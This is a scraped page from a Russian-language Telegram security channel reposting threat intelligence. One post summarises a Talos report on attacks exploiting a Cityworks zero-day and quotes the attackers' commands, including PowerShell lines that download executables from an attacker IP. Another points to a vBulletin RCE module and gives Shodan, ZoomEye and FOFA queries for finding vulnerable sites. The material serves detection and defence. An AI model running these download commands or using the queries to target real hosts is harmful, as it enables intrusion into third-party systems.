ar
Feedback
Fsecurity | HH

Fsecurity | HH

الذهاب إلى القناة على Telegram
2 017
المشتركون
-224 ساعات
+27 أيام
-1230 أيام
أرشيف المشاركات
Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

Repost from Proxy Bar
C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations * read Отдельно порадовало iptables -A INPUT -m geoip
C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations * read Отдельно порадовало
iptables -A INPUT -m geoip --src-cc RU,CN -j DROP

⚙️ Кампания UAT-6382: эксплуатация 0-day в Cityworks Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уя
+2
⚙️ Кампания UAT-6382: эксплуатация 0-day в Cityworks Cisco Talos выявила серию атак от группы UAT-6382, использующей 0-day уязвимость CVE-2025-0994 (deserialization RCE) в платформе Cityworks, применяемой органами местного самоуправления США. 🧰 Инструментарий 🔸 WebShells AntSword, Chopper (chinatso), Behinder — размещаются в inetpub\wwwroot, используются как бэкдоры. 🔸 TetraLoader (загрузчик на Rust) Скомпилирован с использованием MaLoader — malware-билдера. Распаковывает shellcode и внедряет его в легитимные процессы (`notepad.exe`, dllhost.exe, gpupdate.exe`) через `NtMapViewOfSection, RtlCreateUserThread и др. 🔸 Payloads Cobalt Strike Beacons — используют HTTPS C2 (например, cdn[.]lgaircon[.]xyz`) и маскируются под .js`-запросы. VShell — легкий RAT на Go: команды, прокси, скриншоты, файловые операции. Панель управления преимущественно на китайском. 🔎 Hunting Notes 🔹 Обнаруженные команды:
cmd.exe /c ipconfig cmd.exe /c pwd cmd.exe /c dir cmd.exe /c dir .. cmd.exe /c dir c:\ cmd.exe /c dir c:\inetpub cmd.exe /c tasklist cmd.exe /c dir c:\inetpub\wwwroot cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\WebSite\Assets cmd.exe /c dir c:\inetpub\wwwroot\CityworksServer\ cmd.exe /c copy c:\inetpub\wwwroot\CityworksServer\<backup_archives> c:\inetpub\wwwroot\CityworksServer\Uploads\ powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/LVLWPH.exe' -OutFile '<путь>\LVLWPH.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/MCUCAT.exe' -OutFile 'C:\windows\temp\z1.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/TJPLYT.exe' -OutFile 'C:\windows\temp\z33.exe' powershell -Command Invoke-WebRequest -Uri 'http://IP:3219/z44.exe' -OutFile 'C:\windows\temp\z44.exe'
🔹 Что ещё искать: PowerShell с Invoke-WebRequest к IP-адресам Размещение ASP/ASPX файлов в inetpub\wwwroot Инъекции в dllhost.exe, gpupdate.exe, notepad.exe C2-домены Запросы к URI вроде /jquery-3.3.1.min.js, /owa/... — подделка под легитимный JS-трафик Rust-бинарники со встроенным shellcode и артефактами MaLoader 🔗https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/ 🦔 THF

🔗Ссылка: https://opennet.ru/63310/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/63305/

Repost from 1N73LL1G3NC3
Unauthenticated RCE module for vBulletin 5.1.0-6.0.3 Write-up: https://karmainsecurity.com/dont-call-that-protected-method-vb
Unauthenticated RCE module for vBulletin 5.1.0-6.0.3 Write-up: https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce Search query:
ZoomEye: app="vBulletin" Shodan: http.html:"content=\"vBulletin" FOFA: app="vBulletin"